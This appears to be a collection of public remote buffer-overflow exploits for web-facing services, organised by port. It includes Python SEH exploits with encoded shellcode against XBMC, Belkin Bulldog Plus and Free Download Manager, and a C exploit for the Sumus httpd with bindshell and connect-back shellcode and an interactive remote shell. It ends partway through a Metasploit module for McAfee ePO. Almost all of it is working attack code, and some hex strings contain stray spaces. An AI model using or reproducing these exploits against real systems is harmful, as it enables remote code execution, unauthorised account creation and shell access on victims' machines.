Credits to n00b for finding the buffer overflow and writing
exploit.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''
import sys, socket
import struct
port = 80
host = sys.argv[1]
#1635
Junk_buffer1 = 'A'*998
Pointer_To_Next_SEH = struct.pack('<L',0x909006eb)
###
###/SafeSEH Module Scanner, item 55
# SEH mode=/SafeSEH OFF
# Base=0x62e80000
# Limit=0x62e97000
# Module Name=C:\Program Files\XBMC\zlib1.dll
###
###This was found in the module zlib1 and is universal.
#62E83BAC 5B POP EBX
#62E83BAD 5D POP EBP
#62E83BAE ^E9 CDD9FFFF JMP zlib1.compressBound
SE_Handler = struct.pack('<L',0x62E83BAC)
Junk_buffer3 = 'D'*635
Shell_code=(#
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x 4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x 4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x 46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x 45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x 4e\x50\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x 4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x 43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x 42\x4c\x4a\x37"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x 4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x 42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x 4f\x55\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x 42\x4c\x4b\x57"
"\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x 4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x 43\x46\x41\x56"
"\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x 42\x30\x5a"
)
# create a socket object called 'c'
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the socket
c.connect((host, port))
Request = (Junk_buffer1 + Pointer_To_Next_SEH + SE_Handler + Shell_code + Junk_buffer3)
# create a file-like object to read
fileobj = c.makefile('r', 0)
# Ask the server for the file
fileobj.write("GET /"+Request+" HTTP/1.1\n\n")
# [2009-04-06]
80 XBMC 8.10 (HEAD) Remote Buffer Overflow Exploit (SEH)
#!/usr/bin/python
# Usage : exploit.py [victime_ip]
# Bug : XBMC 8.10 (HEAD Request) Remote Buffer Overflow Exploit (SEH)
# Refer : http://www.enigmagroup.org/exploits/8354
# Tested on : Xp sp2 (fr)
# Exploited by : His0k4
# Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
# Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
import struct
import sys, socket
host = sys.argv[1]
buff1 = 'A'*998
Pointer_To_Next_SEH = struct.pack('<L',0x909006eb)
###
###This was found in the module zlib1 and is universal.
#62E83BAC 5B POP EBX
#62E83BAD 5D POP EBP
#62E83BAE ^E9 CDD9FFFF JMP zlib1.compressBound
SE_Handler = struct.pack('<L',0x62E83BAC)
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shell_code=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x33\x 4b\x58\x4e\x37"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x 4a\x51\x4b\x48"
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x48\x 46\x33\x4b\x38"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x52\x46\x50\x45\x57\x 45\x4e\x4b\x38"
"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x 4e\x30\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x48\x 4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x58\x4e\x45\x46\x32\x46\x50\x 43\x4c\x41\x33"
"\x42\x4c\x46\x36\x4b\x48\x42\x34\x42\x53\x45\x58\x 42\x4c\x4a\x57"
"\x4e\x30\x4b\x38\x42\x54\x4e\x30\x4b\x38\x42\x47\x 4e\x31\x4d\x4a"
"\x4b\x48\x4a\x56\x4a\x50\x4b\x4e\x49\x50\x4b\x48\x 42\x38\x42\x4b"
"\x42\x50\x42\x30\x42\x30\x4b\x58\x4a\x56\x4e\x43\x 4f\x35\x41\x43"
"\x48\x4f\x42\x36\x48\x55\x49\x48\x4a\x4f\x43\x58\x 42\x4c\x4b\x57"
"\x42\x55\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x 4a\x46\x4a\x39"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x 43\x46\x41\x46"
"\x4e\x36\x43\x36\x42\x30\x5a"
)
buff2 = 'B'*635
payload = buff1 + Pointer_To_Next_SEH + SE_Handler + shell_code + buff2
head = "HEAD /"+payload+" HTTP/1.1\r\n"
head += "Host: "+host+"\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,80))
s.send(head + "\r\n\r\n")
s.close()
# [2009-04-07 ]
80 Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit
#!/usr/bin/python
# _ _ _ __ _ _ _
#| || | (_) ___ / \ | |__ | | |
#| __ | | | (_-< | () | | / / |_ _|
#|_||_| |_| /__/ \__/ |_\_\ |_|
#
# Usage : belkin.py [victime_ip]
# Bug : Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit
# Credits go to : Elazar Broad
# Tested on : Xp sp3 (EN)(VB)
# Exploited by : His0k4
# Greetings : All friends & muslims HaCkErs (DZ),snakespc.com
# Chabiba wa sayd el ba7ri :D
import sys, socket
import base64
host = sys.argv[1]
port = 80
# win32_adduser - PASS=27 EXITFUNC=seh USER=DZ Size=477 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4a\x4e\x46\x54"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x 4b\x58\x4e\x37"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x 4a\x31\x4b\x58"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x48\x 46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x45\x46\x32\x46\x30\x45\x57\x 45\x4e\x4b\x48"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x 4e\x30\x4b\x34"
"\x4b\x58\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x 4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x30\x 43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x53\x45\x48\x 42\x4c\x4a\x37"
"\x4e\x30\x4b\x58\x42\x34\x4e\x30\x4b\x48\x42\x57\x 4e\x41\x4d\x4a"
"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x 42\x58\x42\x4b"
"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x53\x 4f\x45\x41\x53"
"\x48\x4f\x42\x46\x48\x45\x49\x38\x4a\x4f\x43\x58\x 42\x4c\x4b\x37"
"\x42\x35\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x55\x 4a\x56\x4a\x39"
"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x 43\x56\x4d\x56"
"\x46\x56\x50\x32\x45\x56\x4a\x57\x45\x36\x42\x32\x 4f\x52\x43\x56"
"\x42\x52\x50\x36\x45\x46\x46\x57\x42\x42\x45\x37\x 43\x47\x45\x46"
"\x44\x57\x42\x42\x46\x34\x4c\x55\x42\x42\x44\x43\x 47\x53\x42\x52"
"\x4f\x52\x41\x54\x46\x44\x46\x34\x42\x32\x48\x42\x 48\x42\x42\x52"
"\x50\x36\x45\x36\x46\x57\x42\x52\x4e\x36\x4f\x56\x 43\x56\x41\x46"
"\x4e\x56\x47\x36\x44\x57\x4f\x56\x45\x57\x42\x57\x 42\x32\x41\x54"
"\x46\x36\x4d\x36\x49\x46\x50\x46\x49\x46\x43\x57\x 46\x57\x44\x37"
"\x41\x46\x46\x37\x4f\x46\x44\x37\x43\x47\x42\x32\x 46\x54\x4c\x35"
"\x42\x52\x4f\x42\x41\x54\x46\x44\x46\x54\x42\x50\x 5a")
jump="\xFF\x54\x24\x58" #Jump to the GET request wich contains our shellcode.
ret="\xFF\x17\x49\x7E" #Friendly jmp esp "user32.dll".
junk = "\x41"*16
exploit1 = base64.encodestring(ret + jump + junk)
exploit2 = shellcode
head = 'GET '+exploit2+' HTTP/1.1\r\n'
head += 'Authorization: Basic '+exploit1+'\r\n\r\n'
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(head)
# [2009-04-27]
80 Free Download Manager 2.5/3.0 (Control Server) Remote BOF Exploit
#!/usr/bin/python
# Usage : fdm.py [victime_ip]
# Bug : Free Download Manager 2.5/3.0 (Control Server) Remote BOF Exploit
# Fix : update
# Founder : Praveen Darshanam
# Tested on : Xp sp3 (en)
# Exploited by : His0k4
# Greetings : All friends & muslims HaCkErs (DZ)
import sys, socket
import base64
from time import *
host = sys.argv[1]
port = 80
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4a\x4e\x46\x34"
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x 4b\x58\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x 4a\x31\x4b\x48"
"\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x38\x 46\x53\x4b\x38"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x 45\x4e\x4b\x38"
"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x38\x 4e\x50\x4b\x44"
"\x4b\x48\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x 4e\x41\x4b\x48"
"\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x52\x46\x50\x 43\x4c\x41\x33"
"\x42\x4c\x46\x56\x4b\x48\x42\x44\x42\x43\x45\x58\x 42\x4c\x4a\x37"
"\x4e\x50\x4b\x38\x42\x44\x4e\x50\x4b\x38\x42\x37\x 4e\x31\x4d\x4a"
"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x 42\x38\x42\x4b"
"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x56\x4e\x43\x 4f\x45\x41\x43"
"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x48\x 42\x4c\x4b\x37"
"\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x 4a\x56\x4a\x49"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x 43\x56\x41\x56"
"\x4e\x46\x43\x46\x42\x50\x5a")
exploit = "3-1 "# a trick & a memory ;)
exploit += shellcode
exploit += "\x41"*(1003-len(shellcode))
exploit += "\xE8\x10\xFC\xFF\xFF"
exploit += "\x93\xB1\x40\x00" #jmp esp fdmwi
exploit += "\x90"*4
exploit += "\x73\xF1\x42\x42"
auth = base64.b64encode(exploit)
head = 'GET '+shellcode+' HTTP/1.1\r\n'
head += 'Host: '+sys.argv[1]+'\r\n'
head += 'Authorization: Basic '+auth+'\r\n\r\n'
i=0
#3a9liya MIAS xD
while i<=2:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(head)
i=i+1
# [2009-06-09]
إنتهينا من بورت 80
الان نبداء بـ بورت 81
81 Sumus 0.2.2 httpd Remote Buffer Overflow Exploit
/*[ sumus[v0.2.2]: (httpd) remote buffer overflow exploit. ]****
* *
* by: vade79/v9 [email protected] (fakehalo/realhalo) *
* *
* compile: *
* gcc xsumus.c -o xsumus *
* *
* syntax: *
* ./xsumus [-pscrln] -h host *
* *
* sumus homepage/url: *
* http://sumus.sourceforge.net *
* *
* Mus is a Spanish cards game played by 4 folks around a *
* table. SUMUS is a server for playing mus over Internet. The *
* project is just the server, but Java applet and Linux *
* console clients are provided. *
* *
* SUMUS contains a remotely exploitable buffer overflow in *
* the httpd portion of its server code, which runs *
* automatically upon starting the SUMUS server(usually port *
* 81). *
* *
* the overflow itself occurs on the stack, but it isn't quite *
* cut and dry as normal. this overflow occurs in a while() *
* byte-by-byte write loop, and the integers used in the loop *
* get overwritten before it makes it to the eip/return *
* address. this is best explained by viewing the code *
* itself: *
* *
* ----------------------------------------------------------- *
* char Buffer[65536] ; *
* ... *
* k = recv( SocketWebPendientes[ j ], Buffer, 20480, 0 ) ; *
* if( k > 0 ) *
* RespondeHTTPPendiente( j ) ; *
* ... *
* void RespondeHTTPPendiente( int Pos ) *
* { *
* int j ,kk ,faltan ; *
* char tmpCad[100], *p1, *p2 ; *
* FILE *f ; *
* *
* Buffer[400] = 0 ; *
* p1 = strstr( Buffer, "GET" ) ; *
* if( p1 == NULL ) p1 = strstr( Buffer, "Get" ) ; *
* if( p1 == NULL ) p1 = strstr( Buffer, "get" ) ; *
* if( p1 != NULL ) *
* { *
* j = 5 ; *
* kk = 0 ; *
* if( j < strlen(p1) ) *
* while ( p1[j] != ' ' && p1[j] ) *
* tmpCad[kk++] = p1[j++] ; *
* tmpCad[kk] = 0 ; *
* } *
* ... *
* ----------------------------------------------------------- *
* *
* as you can see this makes for a special situation. the *
* best method i came up with was to format the buffer like *
* so: *
* [400 bytes] | [20000 bytes] *
* [FILLER]["GET"][FILLER][new "kk"][ADDR] | [EGG/SHELLCODE] *
* *
* this way since the new "kk"/addr ends right the 400 *
* boundary point, only the overwritten "kk" integer needs to *
* be worried about(and not the "j" integer as well). *
* *
* i mainly made this because it was a moderatly different *
* exploit method than the norm. figured i'd see if it could *
* be done, and here we are. *
* *
* tested with default values(on static binary): *
* + gentoo-r5 : successful. *
* + mandrake9.1/default : successful. *
* + mandrake9.1/secure : failed. *
* + fedora core2 : successful. *
************************************************** *************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <getopt.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE 399
#define EGGSIZE 20000
#define TIMEOUT 10
#define DFL_PORT 81
#define DFL_SPORT 7979
#define DFL_RETADDR 0x0805a001
#define DFL_LOCT_KK 105
#define DFL_JUMP_KK 10
/* globals. */
static char x86_bind[]= /* bindshell, from netric. */
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x 66"
"\xcd\x80\x31\xd2\x52\x66\x68\xff\xff\x43\x66\x53\x 89"
"\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x 89"
"\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x 52"
"\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x 80"
"\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x 68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\x cd"
"\x80";
static char x86_conn[]= /* connect-back, eSDee/netric. */
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x 51"
"\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\x c2"
"\x31\xc0\x31\xc9\x51\x51\x68\xff\xff\xff\xff\x66\x 68"
"\xff\xff\xb1\x02\x66\x51\x89\xe7\xb3\x10\x53\x57\x 52"
"\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1\x 74"
"\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\x d3"
"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x 31"
"\xc0\xb0\x3f\x89\xd3\xb1\x02\xcd\x80\x31\xc0\x31\x d2"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\x e3"
"\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x cd"
"\x80";
char *x86_ptr;
struct{
unsigned char new_kk;
signed short loct_kk;
unsigned int addr;
char *host;
unsigned short port;
unsigned short sport;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
char *getbuf(unsigned int);
char *getegg(unsigned int);
unsigned short sumus_connect(char *,unsigned short);
void getshell(char *,unsigned short);
signed int getshell_bind_init(unsigned short);
signed int getshell_bind_accept(signed int);
signed int getshell_conn(char *,unsigned short);
void proc_shell(signed int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm/timeout hit.",1);}
/* start. */
int main(int argc,char **argv){
unsigned char tmp_new=0;
signed int chr=0,rsock=0;
unsigned int bs=0;
struct hostent *t;
in_addr_t s=0;
printf(" sumus[v0.2.2]: (httpd) remote buffer overflow explo"
"it.\n by: vade79/v9 [email protected] (fakehalo/realhalo)\n\n");
tbl.port=DFL_PORT;
tbl.sport=DFL_SPORT;
tbl.addr=DFL_RETADDR;
tbl.loct_kk=DFL_LOCT_KK;
while((chr=getopt(argc,argv,"h:p:s:c:r:l:n:"))!=EOF){
switch(chr){
case 'h':
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
break;
case 'p':
tbl.port=atoi(optarg);
break;
case 's':
tbl.sport=atoi(optarg);
break;
case 'c':
if((s=inet_addr(optarg))){
if((t=gethostbyname(optarg)))
memcpy((char *)&s,(char *)t->h_addr,sizeof(s));
if(s==-1)s=0;
if(!s)printe("invalid host/ip. (-c option)",0);
}
break;
case 'r':
sscanf(optarg,"%x",&tbl.addr);
break;
case 'l':
tbl.loct_kk=atoi(optarg);
break;
case 'n':
tmp_new=atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.host)usage(argv[0]);
if(tbl.loct_kk<0||tbl.loct_kk>BUFSIZE)tbl.loct_kk=DFL_LOCT_KK;
/* set bind port for shellcode. */
if(!s){
bs=strlen(x86_bind);
x86_bind[20]=(tbl.sport&0xff00)>>8;
x86_bind[21]=(tbl.sport&0x00ff);
x86_ptr=x86_bind;
}
/* set connect-back ip/port for shellcode. */
else{
bs=strlen(x86_conn);
x86_conn[33]=(s&0x000000ff);
x86_conn[34]=(s&0x0000ff00)>>8;
x86_conn[35]=(s&0x00ff0000)>>16;
x86_conn[36]=(s&0xff000000)>>24;
x86_conn[39]=(tbl.sport&0xff00)>>8;
x86_conn[40]=(tbl.sport&0x00ff);
x86_ptr=x86_conn;
}
if(bs!=strlen(x86_ptr))
printe("ip(-c option) and/or port(-s option) appear to contain a "
"null-byte, try again.",1);
tbl.new_kk=(tbl.loct_kk+(tmp_new?tmp_new:DFL_JUMP_ KK));
if(!tbl.new_kk)
printe("ip(-l/-n option) made the overwritten \"kk\" integer a "
"null-byte.",1);
printf(" target\t\t\t: %s:%d\n",tbl.host,tbl.port);
printf(" shellcode type\t\t: %s(port=%d)\n",
(s?"connect-back":"bindshell"),tbl.sport);
printf(" return address($eip)\t: 0x%.8x\n",tbl.addr);
printf(" overwritten \"kk\" int value\t: "
"%u(0x%.2x)\n",tbl.new_kk,tbl.new_kk);
printf(" overflow size\t\t: %u(tot=%u) byte(s)\n",
tbl.loct_kk,BUFSIZE);
printf(" egg size\t\t\t: %u byte(s)\n\n",EGGSIZE);
if(s){
rsock=getshell_bind_init(tbl.sport);
sumus_connect(tbl.host,tbl.port);
rsock=getshell_bind_accept(rsock);
}
else{
sumus_connect(tbl.host,tbl.port);
rsock=getshell_conn(tbl.host,tbl.sport);
}
if(rsock>0)proc_shell(rsock);
exit(0);
}
char *getbuf(unsigned int addr){
char *buf;
if(!(buf=(char *)malloc(BUFSIZE+1)))
printe("getbuf(): allocating memory failed.",1);
/* 0x08 helps hide the appearance of a giant string, */
/* for the server side display. */
memset(buf,0x08,BUFSIZE);
memcpy(buf+(BUFSIZE-tbl.loct_kk-9),"GET",3);
/* this will overwrite the "kk" integer of the sumus server. */
buf[BUFSIZE-5]=tbl.new_kk;
/* the address/value used to write in the while() loop right */
/* after the "kk" integer has been overwritten/changed. */
*(long *)&buf[BUFSIZE-4]=addr;
buf[BUFSIZE]='\n';
return(buf);
}
char *getegg(unsigned int size){
char *buf;
if(!(buf=(char *)malloc(size+1)))
printe("getegg(): allocating memory failed",1);
memset(buf,0x90,(size-strlen(x86_ptr)));
memcpy(buf+(size-strlen(x86_ptr)),x86_ptr,
strlen(x86_ptr));
return(buf);
}
unsigned short sumus_connect(char *hostname,unsigned short port){
signed int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf(" attempting to connect: %s:%d.\n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("sumus connection failed.",1);
alarm(0);
printf(" successfully connected: %s:%d.\n",hostname,port);
printf(" sending string: [FILLER][\"GET\"][FILLER][new \"kk\"]"
"[ADDR][EGG]\n");
sleep(1);
write(sock,getbuf(tbl.addr),BUFSIZE);
write(sock,getegg(EGGSIZE),EGGSIZE);
sleep(1);
printf(" closing connection.\n\n");
close(sock);
return(0);
}
signed int getshell_bind_init(unsigned short port){
signed int ssock=0,so=1;
struct sockaddr_in ssa;
ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
#ifdef SO_REUSEPORT
setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
#endif
ssa.sin_family=AF_INET;
ssa.sin_port=htons(port);
ssa.sin_addr.s_addr=INADDR_ANY;
if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)
printe("could not bind socket.",1);
listen(ssock,1);
return(ssock);
}
signed int getshell_bind_accept(signed int ssock){
signed int sock=0;
unsigned int salen=0;
struct sockaddr_in sa;
memset((char*)&sa,0,sizeof(struct sockaddr_in));
salen=sizeof(sa);
printf(" awaiting connection from: *:%d.\n",tbl.sport);
alarm(TIMEOUT);
sock=accept(ssock,(struct sockaddr *)&sa,&salen);
alarm(0);
close(ssock);
printf(" connection established. (connect-back)\n");
return(sock);
}
signed int getshell_conn(char *hostname,unsigned short port){
signed int sock=0;
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))= =-1)
printe("getshell_conn(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell_conn(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
printf(" attempting to connect: %s:%d.\n",hostname,port);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
exit(1);
}
alarm(0);
printf(" successfully connected: %s:%d.\n\n",hostname,port);
return(sock);
}
void proc_shell(signed int sock){
signed int r=0;
char buf[4096+1];
fd_set fds;
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}
void usage(char *progname){
printf("syntax: %s [-pscrln] -h host\n\n",progname);
printf(" -h <host/ip>\ttarget hostname/ip.\n");
printf(" -p <port>\ttarget port.\n");
printf(" -s <port>\tconnect-back/bind port. (shellcode)\n");
printf(" -c <host/ip>\tconnect-back host/ip. (enables "
"connect-back)\n");
printf(" -r <addr>\tdefine return address. (0x%.8x)\n",tbl.addr);
printf(" -l <value>\tdistance from the start pointer. (\"GET\")\n");
printf(" -n <offset>\tadds to the overwritten \"kk\" integer.\n\n");
exit(0);
}
// [2005-04-14]
81 McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 (Source) Remote Exploit
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::mcafee_epolicy_source;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'McAfee ePolicy Orchestrator / ProtPilot Source Overflow',
'Version' => '$Revision: 1.0 $',
'Authors' =>
[
'muts <muts [at] remote-exploit.org>',
'xbxice[at]yahoo.com',
'H D Moore <hdm [at] metasploit.com>'
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
